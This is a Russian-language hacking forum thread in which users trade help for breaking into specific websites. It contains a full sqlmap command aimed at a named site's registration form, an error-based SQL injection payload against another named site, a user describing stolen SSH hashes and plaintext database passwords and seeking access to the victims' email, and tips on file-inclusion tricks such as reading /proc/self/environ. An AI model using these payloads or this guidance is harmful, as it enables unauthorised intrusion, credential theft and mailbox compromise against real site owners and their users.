Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,777
    Likes Received:
    848
    Reputations:
    857
    Так бывает, когда скуля раскручиваемая, но SQLMap не может придумать вектор в рамках своей неопытности. Такой случай только руками.
     
    _________________________
  2. xxl

    xxl New Member

    Joined:
    22 Nov 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    Хорошо,уже что-то... А какой из параметров? first_name? у меня ручками не получается... (';+UNION+SELECT+error-based & etc). А вообще я запускал софтину с ключем --parse-errors. А это значит,что он должен был мне показать саму ошибку,так? Или нужно было включить траффик-лог?
     
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,777
    Likes Received:
    848
    Reputations:
    857
    Вообще то в работе пишут какой параметр injectable.

    Почитал твой последний лог - у тебя там вообще не описан URL.

    Отсюда вывод, что либо он имеет вид url/?param=123 или url/param/123 и SQLMap автоматом атакует последний и единственный параметр.
     
    _________________________
  4. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    580
    Likes Received:
    148
    Reputations:
    94
    После уязвимого параметра нужно (*) поставить, чтобы обозначить точку атаки.
     
  5. xxl

    xxl New Member

    Joined:
    22 Nov 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    http://sub.adomain.ru/users/register/ т.е. он долбит по "register"... Нежиданно.... Мне казалось,что изначально он прогоняет data-параметры
    (те,что постом идут)
     
  6. xxl

    xxl New Member

    Joined:
    22 Nov 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    python /CMS/sqlmap-master/sqlmap.py -u "http://sub.adomain.ru/users/register/ " --data="first_name=aaa&last_name=aaa&email=aqwe@sda.ru&password_1=asdasd&password_2=asdasd&country=none&city=ffff&phone_number=%2B894613216516&traffic_source_types[]=interesting&traffic_desc=ddddd&spec=register&_q=1" -f --random-agent --banner --parse-errors --all --risk=3 --level=5 --batch --dump-format=HTML --output-dir='/var/www/../' -t '/var/www/../traff.txt' > '/var/www/../log.txt'
    В общем,если есть возможность и желание,то прошу помощи,т.к. сам не смог разобраться
    log: http://rghost.ru/private/6LHmtr2tj/45ef36d7704be9bf4bc49b6bd2f9c241
    traff: http://rghost.ru/private/8tx2bwB6Y/a1446f5dad951f089afa935d0ea42365
    Пробовал сделать поиск по файлу траффика(т.к. БД была определена Oracle=> ошибки искал,как ORA-*) результата нет. Да и вообще там нет ошибок,как мне кажется
     
    #24086 xxl, 12 Apr 2015
    Last edited: 12 Apr 2015
  7. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    93
    Likes Received:
    7
    Reputations:
    0
    Есть доступ ко всем файлам на сервере, вытащила ssh хэши, пароли SQL в чистом виде. в общем, это здорово, но мне нужен доступ к их почтам. Не подскажете, где могут быть конфиги?
    EDIT: они юзают horde webmail=>/etc/psa/.webmail.shadow верно? Но этот файл закрыт на чтение root only:( FUCK. Неужели нет никаких более способов? Неужели я потратила целый день за зря :D? ну таааааааааааааак обидно, сил нет
     
    #24087 vikler, 16 Apr 2015
    Last edited: 16 Apr 2015
  8. xxl

    xxl New Member

    Joined:
    22 Nov 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    SquirrelMail 1.4.21 - есть ли уязвимости? Погуглил - информация о наличии уязвимостей есть,но нет эксплойтов...
    + ISPmanager v4 lite. Есть ли что-то? (кроме открытой передачи пароля в API)
     
    #24088 xxl, 17 Apr 2015
    Last edited: 17 Apr 2015
  9. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
  10. xxl

    xxl New Member

    Joined:
    22 Nov 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    http://www.techexpo.kiev.ua/info_page.php?id=-37 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY MID(VERSION(), FLOOR(RAND(0)*2), 64)) - версия БД.
    (
    это если ручками хочешь перебирать,а так:
    sqlmap сказал,что
    [WARNING] no table(s) found.
    Но он пиздит 100%,там самому надо перебирать(SELECT table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema = 'DB')
    )
     
    #24090 xxl, 19 Apr 2015
    Last edited: 19 Apr 2015
  11. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    _________________________
    #24091 kingbeef, 19 Apr 2015
    Last edited: 19 Apr 2015
  12. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,662
    Likes Received:
    886
    Reputations:
    363
    _________________________
  14. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    спасибо, понял
     
  15. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    xxl , если хотите, чтобы Вам помогли, то нужно задавать корректный и внятный вопрос, а еще лучше, опубликовать ссылку на язвимый сайт. Читайте правила! Если не отредактируете, пост будет удален.
     
  16. sunnyfruit

    sunnyfruit Banned

    Joined:
    8 May 2013
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
  17. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
  18. sunnyfruit

    sunnyfruit Banned

    Joined:
    8 May 2013
    Messages:
    18
    Likes Received:
    2
    Reputations:
    0
    Пробовал читать /proc/self/environ но там вроде как инклуд патх везде не дает лазить далее файлов на самом сайте.
    Нулл байт пробовал.
    Слешдотов должно быть именно 4096? Какой предел?
     
  19. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
  20. xxl

    xxl New Member

    Joined:
    22 Nov 2012
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    Сделал. Просто мне казалось,что есть какое-то универсальное решение в случаях,когда мап так ругается.
     
Loading...
Thread Status:
Not open for further replies.